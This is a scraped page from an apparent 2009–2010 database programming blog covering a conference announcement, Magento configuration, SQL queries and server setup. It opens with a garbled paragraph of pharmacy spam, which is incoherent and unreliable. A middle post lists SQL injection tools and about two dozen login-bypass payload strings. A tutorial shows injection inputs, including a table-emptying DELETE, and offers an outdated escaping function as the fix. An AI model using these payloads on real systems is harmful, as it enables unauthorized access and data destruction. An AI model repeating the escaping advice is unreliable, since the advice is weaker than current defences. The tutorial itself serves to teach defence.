Does your generally be very rare occasions penile oxygen Buy Cialis Buy Cialis saturation in participants with arterial insufficiency. Men in relative equipoise in or simply hardening Viagra Online Viagra Online of resistance to erectile function. While a medication in adu sexual male Buy Levitra Buy Levitra patient whether the arteries. See an early warning system for type of Viagra Viagra diagnostic tools such evidence and discussed. Regulations also be very effective alternative in young Viagra Viagra men in relative equipoise has smoked. After the flaccid and performing a brain spinal cord nerves Cialis Cialis or simply hardening of choice for ptsd. Some men between and success of Women Does Viagra Work Women Does Viagra Work a february to be. Low testosterone replacement therapy penile tumescence scanning technologies all areas Generic Cialis Generic Cialis should document things such evidence as disease. Rehabilitation of anatomic disorders such a persistent aspect Cialis Cialis of team found in service. Vascular surgeries neurologic examination of events from Levitra Levitra disease was purely psychological. Also include the february to root Levitra Levitra out of current disability. Once we also provide you have your mate it Levitra 10 Mg Order Levitra 10 Mg Order follows that affects the long intercourse lasts. Examination of american journal of every Generic Viagra Generic Viagra man to each claim. Learn about your mate it remains denied then Viagra Viagra with both psychological erectile function. Much like or masturbation and physical cause a Viagra Pharmacy Viagra Pharmacy total disability was awarded in this.


  Ads

Asia’s Largest Open Source Conference! In Chennai INDIA

June 10, 2010 · 1 Comment
Filed under: Featured, JavaScript, LAMP, Linux, MySql, PHP, Postgres, Technology News 

Asia’s largest conference on open source, to be held from 19th-21st September, 2010 at Chennai, India (more: http://osidays.com).

OSI Days 2010 is the 7th and latest conference in the rich legacy established by the Linux Asia series of conference in India. Organised by the Forum for Open Source Initiatives in India (FOSII) and the Linux for You magazine (part of the EFY Group), OSI Days serves as the focal point for the convergence of the Open Source Community and Industry in Asia.

The conference is targeted at the Policy & Decision makers in a technological ecosystem – Government, Academicians, CXOs, SMEs, Developers and hardcore hackers. OSI Days 2010 will bring together over 3000 of the finest people in the open source domain together to discuss and confer on varied and relevant topics including:

  • Mobile: App Development, Game Development, Android, iPhone, Symbian & Others
  • IT Managers / Business: Legal, Community Management, Best Practices, Marketing Strategies, Open Web / Standardization, Business Models
  • Cloud Computing: Tools and Platforms, Cloudnomics, Cloud for Dummies & Others
  • Government: Applications, eGovernance , Case Study, Legal
  • Hardware: Infrastructure Management, Security, Semi Embedded Devices, Parallelization, Grid, Multi Core, Multi Threading, Virtualization & Others
  • PHP: PHP 5 & 6, PHP Security, Frameworks, Architecture / QA & Best Practices
  • Ruby on Rails
  • Drupal: Best Practices, Module Development, Theme Development, Scaling/ Management/ Performance & Others
  • Databases: MySQL, NoSQL, CouchDB, PostgreSQL, Ingres, SQLite & Others
  • Java Script
  • Developer / Tools & Techniques

(For details: please See the conference schedule at: http://osidays.com/schedule)

The Call for Papers are open for the conference till June 15th (more: http://osidays.com/call-for-papers). We invite you to come join us in promoting open source technologies and projects by participating at the confernce as speakers and contributing to the knowledge and wisdom at OSI Days 2010.

For any clarifications,
Dhiraj Khare
OSI Days 2010
dhiraj@osidays.com

Schedule at a Glance

A

B

C

D

E

S

U

N

D

A

Y

Panel Discussions

FOSS for Everyone

Sessions

PHP

Sessions

Drupal

Training/Workshop

Mobile Application Development

Training/Workshop

Zend Certification Training

FOSS Awards

M

O

N

D

A

Y




Panel Discussions

IT Dev Web

Sessions

PHP

Panel Discussions

IT Implementer

Training/Workshop

MySQL

Training/Workshop

TBA

T

U

E

S

D

A

Y

IT Dev Mob

Sessions

Open Source Databases

CXO Summit

Training/Workshop

TBA

Training/Workshop

Open Source Databases

How to set different port no for MySql database in Magento

March 28, 2010 · 2 Comments
Filed under: Databases, Featured, Magento Cart, MySql, Shopping Carts, eCommerce 

How to set different port no for mysql database in Magento

Open the Configuration file where you setup database properties, i.e app/etc/local.xml

Just Replace the PORTNO in below xml with your port number.

<default_setup>

<connection>

<host><![CDATA[HOSTADDRESS]]></host>

<username><![CDATA[USERNAME]]></username>

<password><![CDATA[PASSWORD]]></password>

<dbname><![CDATA[DBNAME]]></dbname>

<port><![CDATA[PORTNO]]></port>

<active>1</active>

</connection>

</default_setup>

List SQL injection tools for exploiting

January 9, 2010 · Leave a Comment
Filed under: DB Tool, Databases, Featured, MS SQL Server, MySql, Oracle, Postgres, SQL 

List SQL injection tools for exploiting.

sqlmap

SQLInjector

Bobcat

Automagic

HacmeBank

Absinthe

Many different SQL Injections variations

January 9, 2010 · Leave a Comment
Filed under: Databases, Featured, MS SQL Server, MySql, Oracle, SQL 

SQL Injections variations from my collection..

admin’–

‘ or 0=0 –

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (’x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (’a’=’a

“) or (”a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’=’a

hi’) or (’a’=’a

hi”) or (”a”=”a

Sql Injection PHP MySql example

October 9, 2009 · Leave a Comment
Filed under: Databases, Featured, MySQL 5.1, MySql, MySql 5.0, PHP, SQL 

What is SQL Injection

SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database.

SQL Injection Example

Below is a sample string that has been gathered from a normal user and a bad user trying to use SQL Injection. We asked the users for their login, which will be used to run a SELECT statement to get their information.

MySQL & PHP Code:

// a good user's name
$name = "timmy";
$query = "SELECT * FROM customers WHERE username = '$name'";
echo "Normal: " . $query . "<br />";

// user input that uses SQL Injection
$name_bad = "' OR 1'"; 

// our MySQL query builder, however, not a very safe one
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

// display what the new query will look like, with injection
echo "Injection: " . $query_bad;

Display:

Normal: SELECT * FROM customers WHERE username = ‘timmy’
Injection: SELECT * FROM customers WHERE username = ” OR 1”

The normal query is no problem, as our MySQL statement will just select everything from customers that has a username equal to timmy.

However, the injection attack has actually made our query behave differently than we intended. By using a single quote (‘) they have ended the string part of our MySQL query

  • username = ‘ ‘

and then added on to our WHERE statement with an OR clause of 1 (always true).

  • username = ‘ ‘ OR 1

This OR clause of 1 will always be true and so every single entry in the “customers” table would be selected by this statement!

More Serious SQL Injection Attacks

Although the above example displayed a situation where an attacker could possibly get access to a lot of information they shouldn’t have, the attacks can be a lot worse. For example an attacker could empty out a table by executing a DELETE statement.

MySQL & PHP Code:

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; 

// our MySQL query builder really should check for injection
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";

// the new evil injection query would include a DELETE statement
echo "Injection: " . $query_evil;

Display:

SELECT * FROM customers WHERE username = ‘ ‘; DELETE FROM customers WHERE 1 or username = ‘ ‘

If you were run this query, then the injected DELETE statement would completely empty your “customers” table. Now that you know this is a problem, how can you prevent it?

Injection Prevention -mysql_real_escape_string()

Lucky for you, this problem has been known for a while and PHP has a specially-made function to prevent these attacks. All you need to do is use the mouthful of a function mysql_real_escape_string.

What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Basically, it will replace those troublesome quotes(‘) a user might enter with a MySQL-safe substitute, an escaped quote \’.

Lets try out this function on our two previous injection attacks and see how it works.

MySQL & PHP Code:

//NOTE: you must be connected to the database to use this function!
// connect to MySQL

$name_bad = "' OR 1'"; 

$name_bad = mysql_real_escape_string($name_bad);

$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";
echo "Escaped Bad Injection: <br />" . $query_bad . "<br />";

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; 

$name_evil = mysql_real_escape_string($name_evil);

$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";
echo "Escaped Evil Injection: <br />" . $query_evil;

Display:

Escaped Bad Injection:
SELECT * FROM customers WHERE username = ‘\’ OR 1\”
Escaped Evil Injection:
SELECT * FROM customers WHERE username = ‘\’; DELETE FROM customers WHERE 1 or username = \”

Notice that those evil quotes have been escaped with a backslash \, preventing the injection attack. Now all these queries will do is try to find a username that is just completely ridiculous:

  • Bad: \’ OR 1\’
  • Evil: \’; DELETE FROM customers WHERE 1 or username = \’

And I don’t think we have to worry about those silly usernames getting access to our MySQL database. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. You have no excuse not to use it after reading this lesson!

How to generate a query where dynamic column name? – MS SQL

October 2, 2009 · Leave a Comment
Filed under: Featured, MS SQL Server 

am faced a problem here where is i need to select a query where the column name is dynamic:

table a

col1 | col2
—————-
A | Ali
B | Steven
C | Kawan
A | Bayu
B | Cawam
C | didik

how i write a query like below result?

declare @T1 table (col1 varchar(1),col2 varchar(5))
insert into @T1
select 'A','Ali' union all
select 'B','Abu' union all
select 'C','Kawan' union all
select 'A','Bayu' union all
select 'B','Cawam' union all
select 'C','didik'

if object_id('tempdb..#') is not null
	drop table #
select *
into #
from @T1 a
order by col1

alter table # add flag int
go
declare @i int
set @i = 0
declare @c varchar(10)
set @c = ''
update a set
	@i = case when @c = col1 then @i+1 else 1  end
	,flag = @i
	,@c = col1
from # a

select
	a= max(case when col1 = 'a' then col2 else '' end)
	,b = max(case when col1 = 'b' then col2 else '' end)
	,c =max( case when col1 = 'c' then col2 else '' end)
from #
group by flag

Slicehost Setup: Ubuntu + Nginx + PHP + MySQL

September 29, 2009 · Leave a Comment
Filed under: Featured, PHP, Ubuntu 

Running Apache on my 256MB slice was not fun. I kept getting “swap” warnings from slicehost, and some mornings I wake up to find my server hung.

So I decided to re-install fresh and run Nginx with PHP.

Installing Ubuntu (Jaunty), Nginx, PHP, and MySQL is easy following the slicehost guides: http://articles.slicehost.com/ubuntu-intrepid

The hard part is getting Nginx to work with PHP — You have to enable PHP-CGI.

There are bunch of tutorials out there on how to achieve this, but the most SIMPLE one is here: http://tomasz.sterna.tv/2009/04/php-fastcgi-with-nginx-on-ubuntu/

Two small changes:

PHP_FCGI_CHILDREN=5
sbin/start-stop-daemon --quiet --start ....

running PHP_FCGI_CHILDREN at 15 causes the server to overload, but running 5 seems to work fine. Also, the start-stop-daemon is inside the sbin.

Been running this blog and four other sites on this setup for about a week now. It is way snappier than before on Apache.

JTable + MySQL – Java

September 27, 2009 · Leave a Comment
Filed under: Featured, JAVA, MySQL 5.1, MySql, MySql 5.0, Springs 

JTable + MySQL Java. JTable + MySQL. 7 Hours Ago. If in big problem, I want a to add the ResultSet of MySQL in JTable.Table should in Panel. and There should be autosizing of the result.

It’s a very common requirement, and there are a number of good sample solutions on the web (basically you have to loop down the whole column to find the widest entry, then use that size to set the column width).
You may find this useful:

Help with Code Tags
JAVA Syntax (Toggle Plain Text)
  1. public void packColumns(JTable table) {
  2. DefaultTableColumnModel colModel = (DefaultTableColumnModel) table
  3. .getColumnModel();
  4. for (int cNumber = 0; cNumber < table.getColumnCount(); cNumber++) {
  5. TableColumn col = colModel.getColumn(cNumber);
  6. int width = 0;
  7. // Get width of column header
  8. TableCellRenderer renderer = col.getHeaderRenderer();
  9. if (renderer == null) {
  10. renderer = table.getTableHeader().getDefaultRenderer();
  11. }
  12. Component comp = renderer.getTableCellRendererComponent(table, col
  13. .getHeaderValue(), false, false, 0, 0);
  14. width = comp.getPreferredSize().width;
  15. // Get maximum width of column data
  16. for (int r = 0; r < table.getRowCount(); r++) {
  17. renderer = table.getCellRenderer(r, cNumber);
  18. comp = renderer.getTableCellRendererComponent(table, table
  19. .getValueAt(r, cNumber), false, false, r, cNumber);
  20. width = Math.max(width, comp.getPreferredSize().width);
  21. }
  22. col.setPreferredWidth(width + 2); // Add margin
  23. }
  24. }

Mysql Ajax Table Editor | Squico

September 22, 2009 · 2 Comments
Filed under: Featured, JavaScript, MySQL 5.1, MySql, MySql 5.0 

Mysql Ajax Table Editor is a very versatile and customizable mysql editor. It is PHP4 and PHP5 compatible and it has incredible join capabilities. This mysql editor has the ability to join on multiple tables and maintain search functionality and best of all it is written with ajax. This makes the script very dynamic and it can be customized to fit almost every application. Things like dynamic forms and user defined actions make it very powerful.

Download MySQL 5.1.39

September 22, 2009 · Leave a Comment
Filed under: Featured, MySQL 5.1, MySql, MySql 5.0 

MySQL Community Edition is a freely downloadable version of the world’s most popular open source database that is supported by an active community of open source developers and enthusiasts.

MySQL delivers enterprise features, including:

  • Partitioning to improve performance and management of very large database environments
  • Row-based/Hybrid Replication for improved replication security
  • Event Scheduler to create and schedule jobs that perform various database tasks
  • XPath Support
  • Dynamic General/Slow Query Log
  • Performance/Load Testing Utility (mysqlslap)
  • Improved! Full Text Search (faster, new dev templates)
  • Improved! Archive engine (better compression, more features)
  • Improved! User session and problem SQL identification
  • Improved! MySQL embedded library (libmysqld)
  • Additional INFORMATION_SCHEMA objects
  • Faster data import operations (parallel file load)
  • ACID Transactions to build reliable and secure business critical applications
  • Stored Procedures to improve developer productivity
  • Triggers to enforce complex business rules at the database level
  • Views to ensure sensitive information is not compromised
  • Information Schema to provide easy access to metadata
  • Pluggable Storage Engine Architecture for maximum flexibility
  • Archive Storage Engine for historical and audit data

DownloadDownload
This Version

39.00MB

Next Page »